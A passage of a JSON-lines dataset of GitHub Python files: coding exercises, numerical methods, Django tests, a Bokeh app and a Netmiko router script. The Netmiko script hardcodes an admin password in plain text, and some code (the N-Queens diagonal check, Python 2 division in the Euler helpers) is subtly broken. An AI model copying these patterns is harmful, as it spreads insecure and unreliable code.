Square\"\"\"\n\n\nclass Square:\n \"\"\"Represents a square\n Attributes:\n __size (int): length of a side of the square\n \"\"\"\n def __init__(the_square, size=0):\n \"\"\"initializing square\n Args:\n size (int): length of a side of the square\n Returns:\n Nothing\n \"\"\"\n if type(size) is not int:\n raise TypeError(\"size must be an integer\")\n else:\n if size < 0:\n raise ValueError(\"size must be >= 0\")\n else:\n the_square.__size = size\n\n def area(the_square):\n \"\"\"computes the area of a square.\n Returns:\n area of square\n \"\"\"\n return (the_square.__size) ** 2\n","repo_name":"JoelCann/alx-higher_level_programming","sub_path":"0x06-python-classes/3-square.py","file_name":"3-square.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12890957452","text":"from collections import defaultdict\ndef solution(keymap, targets):\n answer = []\n dic=defaultdict(int)\n #각 키에 접근하려면 몇번을 눌러야하는지를 저장\n for i in keymap:\n for j,alpa in enumerate(i):\n if dic[alpa] and dic[alpa]>j+1: #더 적게 눌러서 가능하면\n dic[alpa]=j+1\n elif dic[alpa] and dic[alpa]\", callback)\nroot.mainloop()\n","repo_name":"TimKuhn/picasso","sub_path":"picasso/annotation_tool.py","file_name":"annotation_tool.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32422826869","text":"from abc import ABC, abstractmethod\n\n\ndef dy_over_dx(x, y):\n return - ((y * y) / 3) - 2 / (3 * x * x)\n\n\nclass NumericalMethod(ABC):\n def __init__(self):\n pass\n\n def build_solution(self, x0, y0, X, N, **kwargs):\n step = (X - x0) / N\n\n x_points = [x0]\n y_points = [y0]\n\n x0 += step\n\n i = 1\n while x0 <= X:\n x_points += [x0]\n y_points += [y_points[i - 1] + self.recurrent_formula(x_points[i - 1], y_points[i - 1], step)]\n x0 += step\n i += 1\n\n return x_points, y_points\n\n @abstractmethod\n def recurrent_formula(self, prev_x, prev_y, step):\n pass\n\n def get_lte(self, x0, y0, X, N, exact_solution, **kwargs):\n x_points, approximate = self.build_solution(x0, y0, X, N)\n _, exact = exact_solution.build_solution(X, N)\n\n errors = []\n for appr, ex in zip(approximate, exact):\n errors += [abs(ex - appr)]\n\n return x_points, errors\n\n def get_gte(self, x0, y0, X, n, N, exact_solution, **kwargs):\n max_errors = []\n\n for steps in range(n, N + 1):\n max_errors += [max(self.get_lte(x0, y0, X, steps, exact_solution)[1])]\n\n return list(range(n, N + 1)), max_errors\n\n\n\nclass EulerMethod(NumericalMethod):\n def __init__(self):\n super().__init__()\n\n def recurrent_formula(self, prev_x, prev_y, step):\n return step * dy_over_dx(prev_x, prev_y)\n\n\n\nclass ImprovedEulerMethod(NumericalMethod):\n def __init__(self):\n super().__init__()\n\n def recurrent_formula(self, prev_x, prev_y, step):\n return step * dy_over_dx(prev_x + step / 2, prev_y + (step / 2) * dy_over_dx(prev_x, prev_y))\n\nclass RungeKuttaMethod(NumericalMethod):\n def __init__(self):\n super().__init__()\n\n def recurrent_formula(self, prev_x, prev_y, step):\n half_step = step / 2\n\n k1 = dy_over_dx(prev_x, prev_y)\n k2 = dy_over_dx(prev_x + half_step, prev_y + half_step * k1)\n k3 = dy_over_dx(prev_x + half_step, prev_y + half_step * k2)\n k4 = dy_over_dx(prev_x + step, prev_y + step * k3)\n\n return (step / 6) * (k1 + 2 * k2 + 2 * k3 + k4)\n\n\n# tests\nif __name__ == '__main__':\n from exact_solution import MySolution\n\n solution = MySolution(1, 2)\n\n merge = lambda a: list(zip(*a))\n\n euler = EulerMethod()\n print(merge(euler.build_solution(1, 2, 5, 10)))\n print()\n print(merge(euler.get_lte(1, 2, 5, 10, solution)))\n print()\n print()\n\n improved_euler = ImprovedEulerMethod()\n print(merge(improved_euler.build_solution(1, 2, 5, 10)))\n print()\n print(merge(improved_euler.get_lte(1, 2, 5, 10, solution)))\n print()\n print()\n\n runge_kutta = RungeKuttaMethod()\n print(merge(runge_kutta.build_solution(1, 2, 5, 10)))\n print()\n print(merge(runge_kutta.get_lte(1, 2, 5, 10, solution)))\n print()\n print()\n","repo_name":"elatypov20/ComputationalPracticum_DifferentialEquations","sub_path":"numerical_methods.py","file_name":"numerical_methods.py","file_ext":"py","file_size_in_byte":2896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72876420328","text":"import os\n\nfrom telegram import Bot, ForceReply, Update, ParseMode, message\nfrom telegram.ext import (\n CallbackContext,\n CommandHandler,\n Filters,\n MessageHandler,\n Updater,\n)\nfrom .message_utils import _format_message\n\nTOKEN = os.getenv(\"TELEGRAM_TOKEN\")\nCHANNEL_ID = os.getenv(\"CHANNEL_ID\")\n# retreive the channel_id by adding the bot to channel\n# and calling get_updates method on the bot object\n\nbot = Bot(token=TOKEN)\n\n\ndef send_message(message_dict):\n formatted_message = _format_message(message=message_dict)\n bot.send_message(CHANNEL_ID, text=formatted_message, parse_mode=ParseMode.HTML)\n\n\n# def start(update: Update, context: CallbackContext) -> None:\n# \"\"\"Send a message when the command /start is issued.\"\"\"\n# update.message.reply_text(\n# \"hello, here is your metadata {}\".format(update.to_json())\n# )\n\n\n# updater = Updater(TOKEN)\n\n# # Get the dispatcher to register handlers\n# dispatcher = updater.dispatcher\n\n# # on different commands - answer in Telegram\n# dispatcher.add_handler(CommandHandler(\"start\", start))\n# # Start the Bot\n# updater.start_polling()\n\n# # Run the bot until you press Ctrl-C or the process receives SIGINT,\n# # SIGTERM or SIGABRT. This should be used most of the time, since\n# # start_polling() is non-blocking and will stop the bot gracefully.\n# updater.idle()\n","repo_name":"sreevardhanreddi/vaccination_telegram_bot","sub_path":"tele_bot/telegram_bot.py","file_name":"telegram_bot.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7804926033","text":"from visual import *\nimport orbit\n\norbit.makeAxis(3, .02)\n\n\ntime = 0\ntime_delta = .01\n\nsun = sphere(pos = vector(0,0,0), radius = .25)\nearth = sphere(pos = vector(1,0,0), radius = .08, color = color.red)\nasteroid = sphere(pos = vector(.9,0,0), radius = .05, color = color.blue)\njupiter = sphere(pos = vector(5,0,0), radius = .12, color = color.orange )\n\nearth_curve = curve(color = color.red, )\nasteroid_curve = curve(color = color.blue, )\njupiter_curve = curve(color = color.orange, )\n\nearth_V = vector(0, 1, 0)\nasteroid_V = vector(0, 1.3, 0)\njupiter_V = vector(0, .5, 0)\n\npreturb_masses = [1, .005, .5]\n\nmin_distance = mag(earth.pos-asteroid.pos)\nyears = 100\n\nwhile(True):\n rate(45)\n\n\n earth.pos, earth_V = orbit.RK4(earth.pos, earth_V, time_delta)\n jupiter.pos, jupiter_V = orbit.RK4(jupiter.pos, jupiter_V, time_delta)\n\n preturb_positions = [vector(0,0,0), earth.pos, jupiter.pos]\n\n\n asteroid.pos, asteroid_V = orbit.preturb2(asteroid.pos, asteroid_V, preturb_positions, preturb_masses, time_delta)\n\n time += time_delta\n earth_curve.append(earth.pos)\n jupiter_curve.append(jupiter.pos)\n\n asteroid_curve.append(asteroid.pos)\n\n\n\n #find collision points\n if (mag(asteroid.pos-earth.pos) < .01):\n collision_point = sphere(pos = asteroid.pos, radius = .01, color = color.orange)\n\n #time_label = label(pos = vector(1.5,1.5,0), height = .1, text = \"T = {} \".format(time),)\n","repo_name":"kh2026/astrophysics_summer_research","sub_path":"ps5p5xc.py","file_name":"ps5p5xc.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73921673448","text":"#useful functions for project euler\nfrom math import *\nimport sys\nimport random\nimport fractions\n\ndef length(x):\n logs = ceil(log10(x))\n return int(logs)\n\n\n# Returns F(n)\ndef fibonacci(n):\n if n < 0:\n raise ValueError(\"Negative arguments not implemented\")\n return _fib(n)[0]\n\n\n# Returns a tuple (F(n), F(n+1))\ndef _fib(n):\n if n == 0:\n return (0, 1)\n else:\n a, b = _fib(n / 2)\n c = a * (2 * b - a)\n d = b * b + a * a\n if n % 2 == 0:\n return (c, d)\n else:\n return (d, c + d)\n\n'''\ndef isPrime(x):\n for i in range(2, int(sqrt(x)) + 1):\n if x % i == 0:\n return False\n return True\n'''\n\n\n\ndef toBinary(n):\n r = []\n while (n > 0):\n r.append(n % 2)\n n = n / 2\n return r\n\ndef test(a, n):\n \"\"\"\n test(a, n) -> bool Tests whether n is complex.\n \n Returns:\n - True, if n is complex.\n - False, if n is probably prime.\n \"\"\"\n b = toBinary(n - 1)\n d = 1\n for i in xrange(len(b) - 1, -1, -1):\n x = d\n d = (d * d) % n\n if d == 1 and x != 1 and x != n - 1:\n return True # Complex\n if b[i] == 1:\n d = (d * a) % n\n if d != 1:\n return True # Complex\n return False # Prime\n\ndef isPrime(n):\n \"\"\"\n MillerRabin(n, s = 1000) -> bool Checks whether n is prime or not\n \n Returns:\n - True, if n is probably prime.\n - False, if n is complex.\n \"\"\"\n s = 50\n for j in xrange(1, s + 1):\n a = random.randint(1, n - 1)\n if (test(a, n)):\n return False # n is complex\n return True # n is prime\n\ndef pfactorexp(x):\n pfactors = []\n for p in primes:\n if p > x:\n return pfactors\n if x % p == 0:\n exp = 1\n x /= p\n while x % p == 0:\n x /= p\n exp += 1\n pfactors.append((p,exp))\n return pfactors\n\ndef pfactor(x):\n pfactors = []\n num = 0\n for p in primes:\n if p > x:\n return pfactors\n if x % p == 0:\n pfactors.append(p)\n num += 1\n return pfactors\n return pfactors\n\n\ndef esieve(x):\n primes = []\n sieve = [0]*x\n lim = int(sqrt(x))+1\n i = 2\n for i in xrange(2,lim):\n if sieve[i]==0:\n primes.append(i)\n for j in xrange(i*i,x,i):\n sieve[j] = 1\n for k in xrange(i,x):\n if sieve[k]==0:\n primes.append(k)\n return primes\n\n\ndef brent(N):\n if N%2==0:\n return 2\n y,c,m = random.randint(1, N-1),random.randint(1, N-1),random.randint(1, N-1)\n g,r,q = 1,1,1\n while g==1: \n x = y\n for i in range(r):\n y = ((y*y)%N+c)%N\n k = 0\n while (k1:\n break\n return g\n","repo_name":"jhuang314/euler","sub_path":"eulerF.py","file_name":"eulerF.py","file_ext":"py","file_size_in_byte":3169,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15575601728","text":"import json\nimport tarfile\n\nfrom classes.nlu_corpus import NLUCorpus, NLUToBePredict\nfrom classes.ser_corpus import SERCorpus, SERToBePredict\nfrom collections import OrderedDict\n\n\ndef read_json(file_name):\n file_name = file_name.split('!')\n with tarfile.open(file_name[0]) as file:\n content = json.load(file.extractfile(file_name[1][1:]), object_pairs_hook=OrderedDict)\n if content['0'].get(\"text\", None) is not None: # NLU part\n if content['0'].get(\"intent\", None) is not None:\n return NLUCorpus(content)\n else:\n return NLUToBePredict(content)\n else: # SER part\n if content['0'].get(\"valence\", None) is not None:\n return SERCorpus(content)\n else:\n return SERToBePredict(content)\n\n\ndef write_json(file_name, corpus):\n output_dict = {}\n if type(corpus) == NLUToBePredict:\n for sample in corpus.samples:\n s = {\n \"intent\": sample.intent,\n \"text\": sample.text,\n \"slots\": sample.slots\n }\n output_dict[sample.id] = s\n\n elif type(corpus) == SERToBePredict:\n for sample in corpus.samples:\n s = {\n \"features\": sample.features\n }\n if sample.label == 3:\n s[\"valence\"] = 1\n s[\"activation\"] = 1\n elif sample.label == 2:\n s[\"valence\"] = 1\n s[\"activation\"] = 0\n elif sample.label == 1:\n s[\"valence\"] = 0\n s[\"activation\"] = 1\n elif sample.label == 0:\n s[\"valence\"] = 0\n s[\"activation\"] = 0\n else:\n raise ValueError\n output_dict[sample.id] = s\n else:\n raise TypeError\n with open(file_name, 'w') as file:\n file.writelines(json.dumps(output_dict))\n\n\nif __name__ == '__main__':\n a = read_json(\n '/Users/duan/OneDrive - Aerodefense/Uni-Stuttgart/WS19/Deep learning/DeepDarkHomeword/ser_traindev.tar.gz!/dev.json')\n gen = {}\n import random\n for i in range(len(a.samples)):\n gen[str(i)] = {\"valence\": random.randrange(0, 2, 1),\n \"activation\": random.randrange(0, 2, 1)}\n with open('sertest.json', 'w') as f:\n import json\n f.write(json.dumps(gen, indent=2))\n","repo_name":"Fireblossom/DeepDarkHomework","sub_path":"util/IO_util.py","file_name":"IO_util.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70607774250","text":"'''\nHomework 2\nBy: Evelyn Yach (20071956) & Daniel Oh (20063998)\n2021.02.02\n'''\n\n'''\nPlace n Queens on the board without conflict\n'''\ndef check(board, row, col):\n #check row, left\n for i in range(n):\n if board[row][i] == 1:\n return False\n\n #check diagonal, upper left\n #zip() > joins two tuples together\n for i, j in zip(range(row, -1, -1),range(col, -1, -1)):\n if board[i][j] == 1:\n return False\n\n #check diagonal, lower left\n for i, j in zip(range(row, n, -1),range(col, -1, -1)):\n if board[i][j] == 1:\n return False\n\n return True\n\ndef queens(n):\n #create an nxn board\n board = [[0] * n for p in range(n)]\n \n #find a solution\n def recursion(j):\n #base case\n if j >= n:\n return True\n\n #recursion\n for i in range(n):\n if check(board, i, j):\n\n #place queen on board\n board[i][j] = 1\n\n #place rest of queens on board\n if recursion(j + 1) == True:\n return True\n\n #if placing a queen didnt lead to a solution\n #YEET IT\n board[i][j] = 0\n\n #if no queen can be placed in present column\n return False \n\n if recursion(0) == False:\n print(\"No solution exists\")\n return []\n\n return board\n \n\n'''\nPrint the board\n'''\ndef printBoard(board, n):\n for i in range(0,n):\n print(board[i])\n\n\nif __name__ == '__main__':\n\n #board size\n n = 10\n \n #place queens in safety\n board = queens(n)\n\n #print the board\n #where True is a safe spot to place a Queen with no\n #conflicts\n if len(board) != 0:\n printBoard(board, n)\n \n \n \n","repo_name":"Dan-Ial/DanEvCISC471","sub_path":"Assignment2/nQueens.py","file_name":"nQueens.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24300745847","text":"\"\"\"\nTests for the ingredients API.\n\"\"\"\nfrom decimal import Decimal\n\nfrom django.contrib.auth import get_user_model\nfrom django.urls import reverse\nfrom django.test import TestCase\n\nfrom rest_framework import status\nfrom rest_framework.test import APIClient\n\nfrom core.models import (\n Ingredient,\n Recipe,\n)\n\nfrom recipe.serializers import IngredientSerializer\n\n\nINGREDIENTS_URL = reverse('recipe:ingredient-list')\n\n\ndef detail_url(ingredient_id):\n \"\"\"Create and return an ingredient detail URL.\"\"\"\n return reverse('recipe:ingredient-detail', args=[ingredient_id])\n\n\ndef create_user(email='user@example.com', password='testpass123'):\n \"\"\"Create and return user.\"\"\"\n return get_user_model().objects.create_user(email=email, password=password)\n\n\nclass PublicIngredientsApiTests(TestCase):\n \"\"\"Test unauthenticated API requests.\"\"\"\n\n def setUp(self):\n self.client = APIClient()\n\n def test_auth_required(self):\n \"\"\"Test auth is required for retrieving ingredients.\"\"\"\n res = self.client.get(INGREDIENTS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)\n\n\nclass PrivateIngredientsApiTests(TestCase):\n \"\"\"Test authenticated API requests.\"\"\"\n\n def setUp(self):\n self.user = create_user()\n self.client = APIClient()\n self.client.force_authenticate(self.user)\n\n def test_retrieve_ingredients(self):\n \"\"\"Test retrieving a list of ingredients.\"\"\"\n Ingredient.objects.create(user=self.user, name='Kale')\n Ingredient.objects.create(user=self.user, name='Vanilla')\n\n res = self.client.get(INGREDIENTS_URL)\n\n ingredients = Ingredient.objects.all().order_by('-name')\n serializer = IngredientSerializer(ingredients, many=True)\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(res.data, serializer.data)\n\n def test_ingredients_limited_to_user(self):\n \"\"\"Test list of ingredients is limited to authenticated user.\"\"\"\n user2 = create_user(email='user2@example.com')\n Ingredient.objects.create(user=user2, name='Salt')\n ingredient = Ingredient.objects.create(user=self.user, name='Pepper')\n\n res = self.client.get(INGREDIENTS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], ingredient.name)\n self.assertEqual(res.data[0]['id'], ingredient.id)\n\n def test_update_ingredient(self):\n \"\"\"Test updating an ingredient.\"\"\"\n ingredient = Ingredient.objects.create(user=self.user, name='Cilantro')\n\n payload = {'name': 'Coriander'}\n url = detail_url(ingredient.id)\n res = self.client.patch(url, payload)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n ingredient.refresh_from_db()\n self.assertEqual(ingredient.name, payload['name'])\n\n def test_delete_ingredient(self):\n \"\"\"Test deleting an ingredient.\"\"\"\n ingredient = Ingredient.objects.create(user=self.user, name='Lettuce')\n\n url = detail_url(ingredient.id)\n res = self.client.delete(url)\n\n self.assertEqual(res.status_code, status.HTTP_204_NO_CONTENT)\n ingredients = Ingredient.objects.filter(user=self.user)\n self.assertFalse(ingredients.exists())\n\n def test_filter_ingredients_assigned_to_recipes(self):\n \"\"\"Test listing ingedients to those assigned to recipes.\"\"\"\n in1 = Ingredient.objects.create(user=self.user, name='Apples')\n in2 = Ingredient.objects.create(user=self.user, name='Turkey')\n recipe = Recipe.objects.create(\n title='Apple Crumble',\n time_minutes=5,\n price=Decimal('4.50'),\n user=self.user,\n )\n recipe.ingredients.add(in1)\n\n res = self.client.get(INGREDIENTS_URL, {'assigned_only': 1})\n\n s1 = IngredientSerializer(in1)\n s2 = IngredientSerializer(in2)\n self.assertIn(s1.data, res.data)\n self.assertNotIn(s2.data, res.data)\n\n def test_filtered_ingredients_unique(self):\n \"\"\"Test filtered ingredients returns a unique list.\"\"\"\n ing = Ingredient.objects.create(user=self.user, name='Eggs')\n Ingredient.objects.create(user=self.user, name='Lentils')\n recipe1 = Recipe.objects.create(\n title='Eggs Benedict',\n time_minutes=60,\n price=Decimal('7.00'),\n user=self.user,\n )\n recipe2 = Recipe.objects.create(\n title='Herb Eggs',\n time_minutes=20,\n price=Decimal('4.00'),\n user=self.user,\n )\n recipe1.ingredients.add(ing)\n recipe2.ingredients.add(ing)\n\n res = self.client.get(INGREDIENTS_URL, {'assigned_only': 1})\n\n self.assertEqual(len(res.data), 1)\n","repo_name":"LondonAppDeveloper/c2-recipe-app-api-2","sub_path":"app/recipe/tests/test_ingredients_api.py","file_name":"test_ingredients_api.py","file_ext":"py","file_size_in_byte":4835,"program_lang":"python","lang":"en","doc_type":"code","stars":95,"dataset":"github-code","pt":"53"} +{"seq_id":"15741878694","text":"from distutils.command.config import config\nfrom netmiko import ConnectHandler\nimport re\nR1 = {\n 'device_type' : 'cisco_ios',\n 'ip' : '10.82.139.122',\n 'username':'admin',\n 'password':'cisco!123',\n 'secret' : 'cisco!123',\n}\n\nconn = ConnectHandler(**R1)\nprint(\"Connection established\")\nip = input('Enter ip add:')\nmask = input('Enter mask:')\n\nip_add = 'ip address ' + ip + ' ' + mask\nconfig_commands = ['int loopback 11', ip_add , 'no shut' ]\n\nif not conn.check_enable_mode():\n conn.enable()\ncfg = conn.send_config_set(config_commands)\n\nprint(cfg)\n\n\n\n","repo_name":"patiladarsh94/Network_Automation","sub_path":"Network_Auto/device_netmiko.py","file_name":"device_netmiko.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39318093177","text":"\nimport random\n\n#Printing out the user's instructions\nprint('I am thinking of a 3 digit number. Try to guess what it is.')\nprint('Here are some clues:')\nprint('When I say:\\t\\tThat means:')\nprint('Pico\\t\\t\\tOne digit is correct but in the wrong position.')\nprint('Fermi\\t\\t\\tOne digit is correct and in the right position.')\nprint('Bagels\\t\\t\\tNo digit is correct')\nprint('I have thought up a number.\\nYou have ten guesses to get it.')\n\n\nuser_active = True\n\n#Main loop for the game\nwhile user_active:\n\n comp_num = str(random.randint(100,999))\n # print(comp_num) #Check line\n num_guesses = 1\n\n #Checking user guesses\n while num_guesses < 11:\n print(f\"Guess #{num_guesses}\")\n \n #checking that the input is valid\n while True:\n guess = str(input())\n if len(guess) != len(comp_num):\n print(\"Oops, that's not a 3 digit number - please guess again:\")\n else:\n break\n \n #Checking If the user has guessed correctly, otherwise running the bagels \n #check function\n if guess == comp_num:\n print('Congratulations! You guessed correctly!')\n break\n else: \n bagels_check = True\n\n for i in range(len(guess)):\n if guess[i] == comp_num[i]:\n print('Fermi')\n bagels_check = False\n elif guess[i] in comp_num:\n print('Pico')\n bagels_check = False\n \n if bagels_check:\n print('Bagels') \n\n num_guesses += 1\n\n print('Would you like to keep playing? (Y/N)')\n \n #Checking that input is valid\n while True:\n user_choice = input().upper()\n if user_choice == 'N' or user_choice == 'Y':\n break\n else:\n print(\"Whoops! I didn't understand that\")\n\n #Checking if user wants to continue\n if user_choice == 'Y':\n print('Here we go again!')\n elif user_choice == 'N':\n break\n","repo_name":"JonathanG94/small_py_projects","sub_path":"1_bagels.py","file_name":"1_bagels.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23223876973","text":"from django.shortcuts import render, render_to_response\n\nfrom bokeh.plotting import figure, output_file, show \nfrom bokeh.embed import components\n\ndef index(request):\n x= [1,3,5,7,9,11,13]\n y= [1,2,3,4,5,6,7]\n title = 'y = f(x)'\n\n plot = figure(title= title , \n x_axis_label= 'X-Axis', \n y_axis_label= 'Y-Axis', \n plot_width =400,\n plot_height =400)\n\n plot.line(x, y, legend= 'f(x)', line_width = 2)\n #Store components \n script, div = components(plot)\n print(\"Scripts--------------\")\n print(script)\n print(\"div--------------\")\n \n print(div)\n\n #Feed them to the Django template.\n return render_to_response('index.html',\n {'script' : script , 'div' : div} )\n\ndef square_plot(request):\n x=range(10)\n y=[a**0.5 for a in x]\n fig=figure(title=\"Y=X^0.5\", x_axis_label=\"X-Axis\", y_axis_label=\"Y-Axis\")\n fig.line(x, y, legend='f(x)', line_width=2)\n script, div = components(fig)\n #Feed them to the Django template.\n return render_to_response('index.html',\n {'script' : script , 'div' : div} )\n\ndef linked_histogram(request):\n import numpy as np\n from bokeh.layouts import row, column\n from bokeh.models import BoxSelectTool, LassoSelectTool, Spacer\n from bokeh.plotting import curdoc\n\n x1 = np.random.normal(loc=5.0, size=400) * 100\n y1 = np.random.normal(loc=10.0, size=400) * 10\n\n x2 = np.random.normal(loc=5.0, size=800) * 50\n y2 = np.random.normal(loc=5.0, size=800) * 10\n\n x3 = np.random.normal(loc=55.0, size=200) * 10\n y3 = np.random.normal(loc=4.0, size=200) * 10\n\n x = np.concatenate((x1, x2, x3))\n y = np.concatenate((y1, y2, y3))\n\n TOOLS=\"pan,wheel_zoom,box_select,lasso_select,reset\"\n\n # create the scatter plot\n p = figure(tools=TOOLS, plot_width=600, plot_height=600, min_border=10, min_border_left=50,\n toolbar_location=\"above\", x_axis_location=None, y_axis_location=None,\n title=\"Linked Histograms\")\n p.background_fill_color = \"#fafafa\"\n p.select(BoxSelectTool).select_every_mousemove = False\n p.select(LassoSelectTool).select_every_mousemove = False\n\n r = p.scatter(x, y, size=3, color=\"#3A5785\", alpha=0.6)\n\n # create the horizontal histogram\n hhist, hedges = np.histogram(x, bins=20)\n hzeros = np.zeros(len(hedges)-1)\n hmax = max(hhist)*1.1\n\n LINE_ARGS = dict(color=\"#3A5785\", line_color=None)\n\n ph = figure(toolbar_location=None, plot_width=p.plot_width, plot_height=200, x_range=p.x_range,\n y_range=(-hmax, hmax), min_border=10, min_border_left=50, y_axis_location=\"right\")\n ph.xgrid.grid_line_color = None\n ph.yaxis.major_label_orientation = np.pi/4\n ph.background_fill_color = \"#fafafa\"\n\n ph.quad(bottom=0, left=hedges[:-1], right=hedges[1:], top=hhist, color=\"white\", line_color=\"#3A5785\")\n hh1 = ph.quad(bottom=0, left=hedges[:-1], right=hedges[1:], top=hzeros, alpha=0.5, **LINE_ARGS)\n hh2 = ph.quad(bottom=0, left=hedges[:-1], right=hedges[1:], top=hzeros, alpha=0.1, **LINE_ARGS)\n\n # create the vertical histogram\n vhist, vedges = np.histogram(y, bins=20)\n vzeros = np.zeros(len(vedges)-1)\n vmax = max(vhist)*1.1\n\n pv = figure(toolbar_location=None, plot_width=200, plot_height=p.plot_height, x_range=(-vmax, vmax),\n y_range=p.y_range, min_border=10, y_axis_location=\"right\")\n pv.ygrid.grid_line_color = None\n pv.xaxis.major_label_orientation = np.pi/4\n pv.background_fill_color = \"#fafafa\"\n\n pv.quad(left=0, bottom=vedges[:-1], top=vedges[1:], right=vhist, color=\"white\", line_color=\"#3A5785\")\n vh1 = pv.quad(left=0, bottom=vedges[:-1], top=vedges[1:], right=vzeros, alpha=0.5, **LINE_ARGS)\n vh2 = pv.quad(left=0, bottom=vedges[:-1], top=vedges[1:], right=vzeros, alpha=0.1, **LINE_ARGS)\n\n layout = column(row(p, pv), row(ph, Spacer(width=200, height=200)))\n\n curdoc().add_root(layout)\n curdoc().title = \"Selection Histogram\"\n\n def update(attr, old, new):\n inds = np.array(new['1d']['indices'])\n if len(inds) == 0 or len(inds) == len(x):\n hhist1, hhist2 = hzeros, hzeros\n vhist1, vhist2 = vzeros, vzeros\n else:\n neg_inds = np.ones_like(x, dtype=np.bool)\n neg_inds[inds] = False\n hhist1, _ = np.histogram(x[inds], bins=hedges)\n vhist1, _ = np.histogram(y[inds], bins=vedges)\n hhist2, _ = np.histogram(x[neg_inds], bins=hedges)\n vhist2, _ = np.histogram(y[neg_inds], bins=vedges)\n\n hh1.data_source.data[\"top\"] = hhist1\n hh2.data_source.data[\"top\"] = -hhist2\n vh1.data_source.data[\"right\"] = vhist1\n vh2.data_source.data[\"right\"] = -vhist2\n\n r.data_source.on_change('selected', update)\n script, div = components(layout)\n return render_to_response('index.html',\n {'script' : script , 'div' : div} )\n","repo_name":"yogendratamang48/BokehDjango","sub_path":"BokehWeb/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4881,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"22457458213","text":"import os\nfrom subprocess import Popen, PIPE\nimport re\nimport tempfile\n\nlocal_dir = os.path.dirname(os.path.realpath(__file__))\nblender_dir = os.path.expandvars(\"%programfiles%/Blender Foundation/Blender\")\n\ndef call(args):\n proc = Popen(args, stdout=PIPE, stderr=PIPE)\n out, err = proc.communicate()\n exitcode = proc.returncode\n #\n return exitcode, out, err\n\nfile_list = ['vtree','ground','plane','cornell','torus','cube']\ns = \"{:02x}\".format(len(file_list))\nfor blend_file in file_list:\n print(\"Exporting: {}.blend\".format(blend_file))\n fd, path = tempfile.mkstemp()\n try:\n os.close(fd)\n exitcode, out, err = call([os.path.join(blender_dir,\"blender.exe\"),os.path.join(local_dir,blend_file + \".blend\"),\"--background\",\"--python\",os.path.join(local_dir,\"blender_export_fill.py\"),\"--\",\"--out\",path])\n if err:\n raise Exception('Unable to loadt: {}. Exception: {}'.format(blend_file,err))\n #print(\"exit: {} \\n out:{}\\n err: {}\\n\".format(exitcode,out,err))\n with open(path, 'r') as outfile:\n s = s + outfile.read()\n finally:\n os.remove(path)\n\n# pico-8 map format\n# first 4096 bytes -> gfx (shared w/ map)\n# second 4096 bytes -> map\nif len(s)>=2*8192:\n raise Exception('Data string too long ({})'.format(len(s)))\n\ntmp=s[:8192]\nprint(\"__gfx__\")\n# swap bytes\ngfx_data = \"\"\nfor i in range(0,len(tmp),2):\n gfx_data = gfx_data + tmp[i+1:i+2] + tmp[i:i+1]\nprint(re.sub(\"(.{128})\", \"\\\\1\\n\", gfx_data, 0, re.DOTALL))\n\nmap_data=s[8192:]\nif len(map_data)>0:\n print(\"__map__\")\n print(re.sub(\"(.{256})\", \"\\\\1\\n\", map_data, 0, re.DOTALL))\n\n","repo_name":"freds72/pico8","sub_path":"models/run_export.py","file_name":"run_export.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"53"} +{"seq_id":"40998070697","text":"import pandas as pd\n\nfrom src.data_preprocessor.missing_handlers.base_missing_handler import BaseMissingHandler\n\n\nclass SolarGenerationMissingHandler(BaseMissingHandler):\n def handle(self, data: pd.DataFrame, solar_generation_column_name: str = 'generation_solar_actual') -> pd.DataFrame:\n missing_solar_data = data[data[solar_generation_column_name].isnull()]\n complete_data = data[~data[solar_generation_column_name].isnull()]\n if not missing_solar_data.empty:\n actual_solar_generation = self._read_actual_solar_generation()\n solar_data = pd.merge(missing_solar_data, actual_solar_generation, left_index=True, right_index=True)\n solar_data[solar_generation_column_name] = solar_data['system_generation'].round(3)\n solar_data.drop(columns=['system_generation'], inplace=True)\n complete_data = pd.concat([complete_data, solar_data])\n complete_data.sort_index(inplace=True)\n return complete_data\n\n def _read_actual_solar_generation(self):\n solar_generation_profile = pd.read_pickle('resources/pv_profile.pkl')\n solar_generation = solar_generation_profile[['date', 'system_generation']]\n solar_generation.set_index('date', inplace=True)\n return solar_generation\n\n\nif __name__ == '__main__':\n from src.data_generator.basic_pipeline import BasicPipeline\n from datetime import datetime\n\n start_day = datetime(2020, 4, 1)\n end_day = datetime(2020, 4, 30)\n pipeline = BasicPipeline(start_day, end_day)\n df = pipeline.fit_transform()\n\n handled = 